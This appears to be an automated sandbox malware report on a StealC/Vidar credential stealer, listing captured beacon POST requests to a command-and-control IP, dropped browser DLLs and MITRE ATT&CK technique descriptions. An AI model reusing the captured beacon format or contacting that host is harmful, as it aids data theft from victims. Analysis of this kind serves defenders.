49 49 4a 4a 4b 46 48 43 46 43 41 2d 2d 0d 0a Data Ascii: ------AEBAKJDGHIIJJKFHCFCAContent-Disposition: form-data; name="token"00864e152d57dc419f1d57d0389de1209764b06274b57d59b6bfe2a4790074aa0d488056------AEBAKJDGHIIJJKFHCFCAContent-Disposition: form-data; name="message"ybncbhylepme------AEBAKJDGHIIJJKFHCFCA--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDBFIIECBGDGDGDHCAKHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 36 34 65 31 35 32 64 35 37 64 63 34 31 39 66 31 64 35 37 64 30 33 38 39 64 65 31 32 30 39 37 36 34 62 30 36 32 37 34 62 35 37 64 35 39 62 36 62 66 65 32 61 34 37 39 30 30 37 34 61 61 30 64 34 38 38 30 35 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 42 46 49 49 45 43 42 47 44 47 44 47 44 48 43 41 4b 2d 2d 0d 0a Data Ascii: ------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="token"00864e152d57dc419f1d57d0389de1209764b06274b57d59b6bfe2a4790074aa0d488056------EGDBFIIECBGDGDGDHCAKContent-Disposition: form-data; name="message"wkkjqaiaxkhb------EGDBFIIECBGDGDGDHCAK--

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AEGHJKJKKJDHIDHJKJDB

C:\ProgramData\CBFBGCGIJKJJKFIDBFCG

C:\ProgramData\DGCFHIDAKECFHIEBFCGI

C:\ProgramData\ECAKECAE

C:\ProgramData\EGHJKJKK

C:\ProgramData\EGHJKJKKJDHIDHJKJDBGCGCBAE

C:\ProgramData\JKEGIDGDGHCAAAAKKFCGDAFIIJ

C:\ProgramData\KEHDHIDAEHCFHJJJJECAAFBKJJ

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\nss3.dll

C:\ProgramData\softokn3.dll

Windows Analysis Report
file.exe

Function 00B99860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 00B845C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 00B8BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 00B94910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 00B99C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 00B87710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Function 00B90250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Function 00B85100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Function 00B8A790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre